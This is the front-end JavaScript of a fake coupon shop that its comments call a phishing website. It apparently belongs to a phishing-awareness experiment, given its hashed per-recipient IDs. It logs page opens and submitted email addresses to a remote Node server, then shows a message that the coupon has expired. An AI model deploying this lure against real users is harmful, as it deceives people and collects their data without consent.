/******************************/
/***** Node JS Connection *****/
/******************************/

/*** Local Node JS Server ***/
//const nodeJSConnection='http://localhost:3000';
/*** Plesk Node JS Server ***/
const nodeJSConnection='https://smartbuyonline.de';
const nodeJSConnectionFirestoreDBEmailCouponForged='/store-data-coupon';
const nodeJSConnectionFirestoreDBStoreOpenedWebsite='/store-data-openedwebsite';


const bar = document.getElementById('bar');
const close = document.getElementById('close');
const nav = document.getElementById('navbar');

if (bar) {
    bar.addEventListener('click', () => {
        nav.classList.add('active')
    })
}

if (close) {
    close.addEventListener('click', () => {
        nav.classList.remove('active')
    })
}


// change image based on width
ready();
function ready() {
    const screenWidth = window.innerWidth || document.documentElement.clientWidth || document.body.clientWidth;
    const userLoggedIn = getCookie("userLoggedIn");
    if(screenWidth < 1200) {
        /* Replace Logo */
        document.querySelector(".logo").src="img/Logo_SmartBuyOnlineSmall.png";
    }
}



// set hashed email address if not already set
const queryString = window.location.search;
const urlParams = new URLSearchParams(queryString);
// URL: http://127.0.0.1:5500/onlineshop_scam/index.html?registration_code=NNNNNN&email=hashvaluehere;
if(urlParams.has('id')) {
    let registrationCodeHashed = "";
    registrationCodeHashed = getRegistrationCode();

    // store that user with registration code hashed id has opened the (phishing) website
    let responseStoreDataCouponForged = "";
    storeDataOpenedPhishingWebsite('dataOpenedPhishingWebsiteFM',registrationCodeHashed, getDevice())
        .then(response => {
            console.log("Result from storeDataOpenedPhishingWebsite(): " + response);
            responseStoreDataCouponForged = response
        })
        .catch(error => {
            console.error('Fehler beim Verarbeiten des Ergebnisses:', error);
        });
}

var loginButton = document.getElementById('login-btn');

document.getElementById('login-btn').addEventListener('click', async (e) => {
    e.preventDefault();

    
    let emailAddress = document.getElementById("login-user-email").value.toLowerCase();


    let password = document.getElementById("login-user-pw").value;
    if(emailAddress.includes('@') && password != '') {

        let responseStoreDataCouponForged= "";

        let registrationCode = "";
        registrationCode = getRegistrationCode();


        let numberOfReceiveCouponAttempts = "Not used anymore!!!"
        storeDataCoupon('dataCouponFM', emailAddress,registrationCode,getDevice())
            .then(response => {
                console.log("Result from dataCouponFM(): " + response);
                responseStoreDataCouponForged = response
            })
            .catch(error => {
                console.error('Fehler beim Verarbeiten des Ergebnisses:', error);
            });
        
        if (responseStoreDataCouponForged == "") {
            console.log("User data stored successfully");
        }



        setTimeout(function() {
            const loginPageElement = document.getElementById('login-page');
            loginPageElement.classList.add('hidden');

            document.querySelector('#hero p').style.display = "none";

            const htmlCode_somethingWentWrong = `
            <h4>Uppps, etwas ist schief gelaufen!</h4>
            <p>Die Gutschein-Code Aktion ist leider bereits abgelaufen.</p>
            `;
            const giftcardElement = document.getElementById('hero');
    
            giftcardElement.insertAdjacentHTML('beforeend', htmlCode_somethingWentWrong);


    
            // remove login page if user successfully logged in
            document.getElementById("remove-box").remove();

            // scroll to top of page
            window.scrollTo(0,0);
        }, 1000);


    }
});


function getRegistrationCode() {
    const queryString = window.location.search;
    const urlParams = new URLSearchParams(queryString);
    
    const registrationCode = getCookie("registrationCode");
    const hashedID = getCookie("registrationCodeHashed");

    if (urlParams.has('id')) {
        const registrationCodeHashedFromURL = urlParams.get('id');

        setCookie("hashedID", registrationCodeHashedFromURL, 8);

        return registrationCodeHashedFromURL.slice(0, 12);
    }
    else if (hashedID != "") {
        return hashedID
    }
    else if (registrationCode != "") {
        const registrationCodeHashed = CryptoJS.SHA256(registrationCode).toString();
        return registrationCodeHashed.slice(0, 12);
    }
    else {
        const invalidCouponRandom = Math.floor(Math.random() * 10000);

        const invalidCouponRandomExist = getCookie("invalid_coupon_random");
        if(invalidCouponRandomExist == "") {
            setCookie("invalid_coupon_random", "INVALID_COUPON_FORGED_"+invalidCouponRandom.toString(),8);
            return ("INVALID_COUPON_FORGED_" + invalidCouponRandom.toString());
        }
        else {
            return invalidCouponRandomExist.toString();
        }
    }    
}







/******************************/
/***** Node JS Connection *****/
/******************************/

async function storeDataCoupon(functionName, param1, param2, param3) {
    try {
      const response = await fetch(nodeJSConnection+nodeJSConnectionFirestoreDBEmailCouponForged, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({ functionName, param1, param2, param3 }),
      });

      const data = await response.json();
      return data.response;
    } catch (error) {
      console.error('Error Connecting to the server. Please check Domain, PORT and GET request:', error);
      throw error;
    }
  }

  async function storeDataOpenedPhishingWebsite(functionName, param1, param2) {
    try {
      const response = await fetch(nodeJSConnection+nodeJSConnectionFirestoreDBStoreOpenedWebsite, {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify({ functionName, param1, param2}),
      });

      const data = await response.json();
      return data.response;
    } catch (error) {
      console.error('Error Connecting to the server. Please check Domain, PORT and GET request:', error);
      throw error;
    }
  }










/*******************/
/***** Helpers *****/
/*******************/

function hideAllChildElements(elements) {
        elements.forEach(function(element) {
            var children = element.querySelectorAll('*');

            children.forEach(function(child) {
                child.style.display = 'none';
            });
        });
}


/*** User Device ***/
function getDevice() {
    const userAgentString = navigator.userAgent;
    if(userAgentString != "") {
        if (/Tablet|iPad/i.test(userAgentString) && navigator.maxTouchPoints > 0) {
            return "Tablet";
        }
        else if ((/Android|iPhone|Mobile/i.test(userAgentString)) && navigator.maxTouchPoints > 0) {
            return "Smartphone";   
        }
        else {
            return "Desktop";
        }
    }
    // device size
    else {
        const screenWidth = window.innerWidth || document.documentElement.clientWidth || document.body.clientWidth;
        const screenHeight = window.innerHeight || document.documentElement.clientHeight || document.body.clientHeight;
        if ((screenWidth >= 1024 && screenHeight >= 768) || (screenWidth >= 768 && screenHeight >= 1024)) {
            return "Desktop";
        }
        else {
            return "Desktop";
        }
    }
  }

/*** set Cookie ***/
function getCookie(cname) {
    let name = cname + "=";
    let decodedCookie = decodeURIComponent(document.cookie);
    let ca = decodedCookie.split(';');
    for(let i = 0; i <ca.length; i++) {
      let c = ca[i];
      while (c.charAt(0) == ' ') {
        c = c.substring(1);
      }
      if (c.indexOf(name) == 0) {
        return c.substring(name.length, c.length);
      }
    }
    return "";
}

  /*** get Cookie ***/
function setCookie(key, value, time) {
    // get the current time
    let d = new Date()
    d.setTime(d.getTime() + (time*24*60*60*1000))

    let expires = "expires=" + d.toUTCString()

    document.cookie = key + "=" + value + ";" + expires + ";" + "SameSite=Strict;" + ";path=/";//";path=/"

}